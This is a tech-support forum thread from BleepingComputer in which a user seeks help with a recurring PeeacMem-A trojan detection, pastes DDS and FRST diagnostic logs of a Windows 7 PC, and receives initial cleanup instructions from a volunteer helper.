Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Unable to remove PeeacMem-A Trojan and other symptoms


  • This topic is locked This topic is locked
14 replies to this topic

#1 sysadmin74

sysadmin74

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 23 October 2014 - 09:49 PM

My computer has been exhibiting strange symptoms over the past several days.  Specifically, downloads are set to disabled under Security Settings for the Internet zone in Internet Explorer and the speaker is muted.  I didn't disable downloads or mute the speaker on my own and no one else who uses the PC did either.  At times, the computer has also generated dllhost.exe processes which take up a lot of system resources.  I ran a virus scan (I have McAfee Internet Security) and quarantined 3 items.  I've also run countless other utilities, including TDSSKiller, Malwarebytes Antimalware, Sophos Virus Removal Tool, Avast and various rootkit removal tools.  Sophos has detected the PeeacMem-A Trojan, but I've been unable to remove it so far.  It finds it and attempts to remove it, but after continuing the scan it is discovered again and removed.  I keep going in this loop.  The most recent Malwarebytes scan didn't reveal any issues.  I'm aware that I may have to re-format the hard drive and re-install the OS, but I was curious as to if there are any suggestions anyone may know of that may fix without a re-install.  Enclosed is the attach.txt file as well as the contents of the DDS.txt file immediately below.  Thank you in advance for any assistance provided for this issue.

 

Sincerely,

 

John

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 10.71.2
Run by Jude at 21:04:57 on 2014-10-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.2814.873 [GMT -5:00]
.
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
.
============== Running Processes ================
.
C:\windows\system32\wininit.exe
C:\windows\system32\lsm.exe
C:\windows\system32\atiesrxx.exe
C:\windows\system32\atieclxx.exe
C:\windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\windows\system32\Dwm.exe
C:\windows\system32\taskhost.exe
C:\windows\Explorer.EXE
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files\DDNI\DIBS\DDNIService.exe
C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe
C:\Program Files\Citrix\GoToMyPC\g2svc.exe
C:\Program Files\Citrix\GoToMyPC\g2comm.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Citrix\GoToMyPC\g2pre.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Citrix\GoToMyPC\g2tray.exe
C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
C:\windows\system32\mfevtps.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Lenovo\HealthCare\HealthCare.exe
C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
C:\Program Files\Epson Software\Event Manager\EEventManager.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe
C:\Program Files\McAfee\MSC\McAPExe.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
C:\Program Files\Citrix\GoToMyPC\g2host.exe
C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
C:\Program Files\Citrix\GoToMyPC\g2printh.exe
C:\Program Files\McAfee\VirusScan\mcods.exe
C:\Program Files\Common Files\McAfee\Platform\Core\mchost.exe
C:\windows\system32\dllhost.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
C:\windows\system32\conhost.exe
C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Program Files\AVAST Software\Avast\avastUi.exe
C:\windows\system32\wbem\unsecapp.exe
C:\windows\system32\taskhost.exe
C:\Program Files\AVAST Software\Avast\ng\mftutil.exe
C:\windows\system32\vssvc.exe
C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTgui.exe
C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe
C:\Program Files\Citrix\GoToMyPC\g2fileh.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\SearchFilterHost.exe
C:\windows\system32\conhost.exe
C:\windows\system32\taskhost.exe
C:\windows\system32\rundll32.exe
c:\windows\system32\svchost.exe -k dcomlaunch
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe -k localservicenetworkrestricted
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted
c:\windows\system32\svchost.exe -k localservice
c:\windows\system32\svchost.exe -k netsvcs
c:\windows\system32\svchost.exe -k gpsvcgroup
c:\windows\system32\svchost.exe -k networkservice
c:\windows\system32\svchost.exe -k localservicenonetwork
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation
c:\windows\system32\svchost.exe -k imgsvc
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted
C:\windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.twcc.com/
mStart Page = about:blank
uURLSearchHooks: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: {9030D464-4C02-4ABF-8ECC-5164760863C6} - <orphaned>
BHO: McAfee SiteAdvisor BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
TB: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
uRun: [EPSON Artisan 730 Series] c:\windows\system32\spool\drivers\w32x86\3\e_fatihqa.exe /fu "c:\users\jude\appdata\local\temp\E_SECED.tmp" /EF "HKCU"
uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /minimized /regrun
mRun: [LenovoFSC] c:\program files\lenovo\fanspeedcontrol\LenovoFSC.exe
mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
mRun: [RtHDVCpl] c:\program files\realtek\audio\hda\RtHDVCpl.exe -s
mRun: [Healthcare] c:\program files\lenovo\healthcare\HealthCare.exe /hide
mRun: [CLMLServer] "c:\program files\lenovo\power2go\CLMLSvc.exe"
mRun: [UpdateP2GoShortCut] "c:\program files\lenovo\power2go\muitransfer\muistartmenu.exe" "c:\program files\lenovo\power2go" updatewithcreateonce "software\cyberlink\power2go\6.0"
mRun: [IdeaNotesUser] c:\program files\ddni\lenovo idea notes\DDNIMSGUser.exe
mRun: [EEventManager] "c:\program files\epson software\event manager\EEventManager.exe"
mRun: [LTCM Client] c:\program files\ltcm client\ltcmClient.exe /startup
mRun: [mcui_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
mRun: [mcpltui_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui
dRunOnce: [WLStart] "c:\program files\windows live\installer\wlstart.exe" /nosearch /nohomepage
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~2\office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 209.18.47.61 209.18.47.62
TCP: Interfaces\{31BDD7EA-8BF2-43DC-97A6-54B8B590C42B} : DHCPNameServer = 209.18.47.61 209.18.47.62
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\program files\mcafee\msc\McSnIePl.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2014-10-23 206248]
R0 mfehidk;McAfee Inc. mfehidk;c:\windows\system32\drivers\mfehidk.sys [2012-6-22 576048]
R0 mfewfpk;McAfee Inc. mfewfpk;c:\windows\system32\drivers\mfewfpk.sys [2012-6-22 217224]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2014-10-23 787800]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2014-10-23 422760]
R1 SCT_SKMScan;SCT_SKMScan;c:\windows\system32\drivers\sct_skmscan.sys [2012-10-12 33096]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-8-19 176128]
R2 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2014-10-23 24184]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2014-10-23 70384]
R2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys [2014-10-23 91496]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2014-10-23 50344]
R2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\skype\toolbars\autoupdate\SkypeC2CAutoUpdateSvc.exe [2014-7-14 1390176]
R2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\skype\toolbars\pnrsvc\SkypeC2CPNRSvc.exe [2014-7-14 1767520]
R2 DDNIMSGService;DDNIMSGService;c:\program files\ddni\lenovo idea notes\DDNIMSGService.exe [2010-10-13 171872]
R2 DDNIService;DDNIService;c:\program files\ddni\dibs\DDNIService.exe [2010-10-13 163680]
R2 EpsonCustomerParticipation;EpsonCustomerParticipation;c:\program files\epson\epsoncustomerparticipation\EPCP.exe [2011-6-9 521600]
R2 HomeNetSvc;McAfee Home Network;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes anti-malware\mbamscheduler.exe [2014-10-19 1871160]
R2 MBAMService;MBAMService;c:\program files\malwarebytes anti-malware\mbamservice.exe [2014-10-19 968504]
R2 McAPExe;McAfee AP Service;c:\program files\mcafee\msc\McAPExe.exe [2013-11-27 145568]
R2 McMPFSvc;McAfee Personal Firewall Service;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 McNaiAnn;McAfee VirusScan Announcer;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 mcpltsvc;McAfee Platform Services;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 McProxy;McAfee Proxy Service;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 mfecore;McAfee Anti-Malware Core;c:\program files\common files\mcafee\amcore\mcshield.exe [2013-11-27 655936]
R2 mfefire;McAfee Firewall Core Service;c:\program files\common files\mcafee\systemcore\mfefire.exe [2012-8-25 169800]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\windows\system32\mfevtps.exe [2012-8-25 179600]
R2 monblanking;monblanking;c:\windows\system32\drivers\monblanking.sys [2014-7-5 29280]
R2 VBoxAswDrv;VBoxAsw Support Driver;c:\program files\avast software\avast\ng\vbox\VBoxAswDrv.sys [2014-10-23 218192]
R2 WinI2C-DDC;WinI2C-DDC Kernel Mode Driver;c:\windows\system32\drivers\ddcdrv.sys [2010-5-7 16200]
R3 AvastVBoxSvc;AvastVBox COM Service;c:\program files\avast software\avast\ng\vbox\AvastVBoxSVC.exe [2014-10-23 3192344]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [2012-8-25 62832]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-11-30 23256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-19 114904]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-10-19 51928]
R3 mfeavfk;McAfee Inc. mfeavfk;c:\windows\system32\drivers\mfeavfk.sys [2012-8-25 238176]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [2012-8-25 369248]
R3 mfencbdc;McAfee Inc. mfencbdc;c:\windows\system32\drivers\mfencbdc.sys [2014-7-24 349192]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\drivers\RtsUStor.sys [2010-5-7 169472]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\drivers\Rt86win7.sys [2010-5-7 167936]
R3 SophosVirusRemovalTool;Sophos Virus Removal Tool;c:\program files\sophos\sophos virus removal tool\SVRTservice.exe [2014-8-11 152872]
R3 SuperIO;Lenovo ASD HWM Driver;c:\windows\system32\drivers\spio.sys [2009-6-5 11720]
S0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2014-10-23 49944]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2014-4-3 315008]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 HipShieldK;McAfee Inc. HipShieldK;c:\windows\system32\drivers\HipShieldK.sys [2014-4-26 147912]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;c:\windows\system32\drivers\hitmanpro37.sys [2014-10-20 30976]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-10-16 108032]
S3 mfebopk;McAfee Inc. mfebopk;c:\windows\system32\drivers\mfebopk.sys [2012-8-25 67816]
S3 mfencrk;McAfee Inc. mfencrk;c:\windows\system32\drivers\mfencrk.sys [2014-7-24 81296]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-13 14848]
S3 ssmirrdr;ssmirrdr;c:\windows\system32\drivers\ssmirrdr.sys [2010-7-21 10112]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2014-3-22 49152]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2010-8-14 1343400]
S3 wsvd;wsvd;c:\windows\system32\drivers\wsvd.sys [2009-7-21 81704]
S3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;c:\windows\system32\drivers\yk62x86.sys [2009-7-13 311296]
.
=============== Created Last 30 ================
.
2014-10-24 01:57:05 -------- d-----w- C:\AdwCleaner
2014-10-24 01:32:58 -------- d-----w- c:\users\jude\appdata\roaming\AVAST Software
2014-10-24 01:30:33 -------- d-----w- c:\windows\system32\vbox
2014-10-24 01:28:37 91496 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-10-24 01:28:36 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-10-24 01:28:36 206248 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-10-24 01:28:35 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-10-24 01:28:35 24184 ----a-w- c:\windows\system32\drivers\aswHwid.sys
2014-10-24 01:28:34 81768 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-10-24 01:28:33 787800 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-10-24 01:28:23 43152 ----a-w- c:\windows\avastSS.scr
2014-10-24 01:27:01 -------- d-----w- c:\program files\AVAST Software
2014-10-24 01:25:59 -------- d-----w- c:\programdata\AVAST Software
2014-10-24 00:40:36 -------- d-----w- c:\programdata\Sophos
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\SVRTgui.exe1_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\SVRTgui.exe_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\ARPPRODUCTICON.exe
2014-10-24 00:39:54 -------- d-----w- c:\program files\Sophos
2014-10-23 17:36:09 -------- d-----w- c:\users\jude\appdata\local\CrashDumps
2014-10-23 04:37:18 -------- d-----w- c:\programdata\Oracle
2014-10-23 04:34:56 96680 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2014-10-21 03:13:51 -------- d-sh--w- C:\$RECYCLE.BIN
2014-10-21 02:34:34 -------- d-----w- c:\program files\ESET
2014-10-21 02:07:58 30976 ----a-w- c:\windows\system32\drivers\hitmanpro37.sys
2014-10-21 02:07:38 -------- d-----w- c:\programdata\HitmanPro
2014-10-21 01:22:20 34808 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-10-21 01:22:15 -------- d-----w- c:\programdata\RogueKiller
2014-10-19 14:45:54 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-19 14:34:08 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-19 14:34:06 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-19 14:34:02 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-16 11:01:08 156824 ----a-w- c:\windows\system32\mscorier.dll
2014-10-16 11:01:08 1131664 ----a-w- c:\windows\system32\dfshim.dll
2014-10-16 11:01:07 81560 ----a-w- c:\windows\system32\mscories.dll
2014-10-16 11:01:04 2379264 ----a-w- c:\windows\system32\win32k.sys
2014-10-16 10:59:47 2744320 ----a-w- c:\windows\system32\rdpcorets.dll
2014-10-16 10:59:32 65536 ----a-w- c:\windows\system32\TSpkg.dll
2014-10-16 10:59:32 523264 ----a-w- c:\windows\system32\termsrv.dll
2014-10-16 10:59:32 31232 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-10-16 10:59:32 304128 ----a-w- c:\windows\system32\winlogon.exe
2014-10-16 10:59:32 184320 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2014-10-16 10:59:32 17408 ----a-w- c:\windows\system32\credssp.dll
2014-10-16 10:59:32 157696 ----a-w- c:\windows\system32\winsta.dll
2014-10-16 10:59:32 130048 ----a-w- c:\windows\system32\rdpcorekmts.dll
2014-10-16 10:59:08 67072 ----a-w- c:\windows\system32\packager.dll
2014-10-16 10:58:35 5702656 ----a-w- c:\windows\system32\mstscax.dll
2014-10-08 21:48:49 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
.
==================== Find3M  ====================
.
2014-10-23 04:18:10 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-23 04:18:10 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-10-01 16:11:10 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-25 22:32:04 2017280 ----a-w- c:\windows\system32\inetcpl.cpl
2014-09-19 01:25:12 4201472 ----a-w- c:\windows\system32\jscript9.dll
2014-09-19 01:14:57 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-09-19 01:14:44 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-09-19 01:02:07 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-09-19 00:50:15 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-09-19 00:49:31 597504 ----a-w- c:\windows\system32\jscript9diag.dll
2014-09-19 00:44:23 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-19 00:36:23 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-09-19 00:18:55 1068032 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- c:\windows\system32\wininet.dll
2014-09-04 07:47:48 53080 ----a-w- c:\windows\system32\spool\prtprocs\w32x86\GoToPrintProcessor.dll
2014-09-04 07:47:46 126296 ----a-w- c:\windows\system32\gotomon.dll
2014-09-04 07:28:16 29280 ----a-w- c:\windows\system32\drivers\monblanking.sys
2014-09-04 05:04:15 372736 ----a-w- c:\windows\system32\rastls.dll
2014-08-23 01:46:55 305152 ----a-w- c:\windows\system32\gdi32.dll
.
============= FINISH: 21:07:10.27 ===============
 

Attached Files



BC AdBot (Login to Remove)

 


#2 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 24 October 2014 - 12:58 AM

Hi, sysadmin74! I'm going to try to help you out. :)

Before we get started, here are some things I need you to remember:

  • Please don't make any changes to your computer without asking me first! This will make it practically impossible for me to assist you.
  • Please don't run things without asking me first, this will also make it impossible for me to help you.
  • If you're getting help elsewhere, or have already resolved the problem, please let me know so I can close this thread.
  • Please respond to me within five days of me replying to you. If you need more time, please let me know. I will close topics that I have not received a response from within five days.
  • Please be patient with me. I need some time to analyze your logs and responses so I can correctly help you. I should respond to you within two days, but if I haven't, please send me a PM! I may have missed your response. Bribing me with candy for faster replies is not advised.
  • If something goes wrong, you don't understand something, or you don't know what to do, please stop and ask me before proceeding with any further steps!

First, it looks like you're running more than one antivirus program (avast! and McAfee). Having more than one AV installed at the same time does more harm than good, often causing false alarms with malware notifications and system performance issues, such as slowing your system down drastically or even freezing from both programs trying to access the same file at the same time. To make things better and easier for the both of us, I need you to remove one of the programs. Please let me know which one you want to remove in your next post.

 

Farbar Recovery Scan Tool
 

Now then, let's run a scan with FRST to get some more information.

  • Download the version of FRST that is designed for your system from here, and save it to your desktop. If you don't know which one is designed for your system, download both and try running both. Only one will work correctly, and that's the one you need to use.
  • Double click the program to run it. Accept the disclaimer and click the Scan button.
  • Once it's done scanning, FRST will create two logs on your desktop, FRST<time-program-was-ran>.txt and Addition<time-program-was-ran>.txt. Please copy and paste both into your reply, one at a time.

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#3 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 24 October 2014 - 07:50 PM

I'm still in the process of uninstalling all antivirus products save for McAfee.  I've pasted the results of the scan here; the FRST scan results are first.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 24-10-2014 19:32:17
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
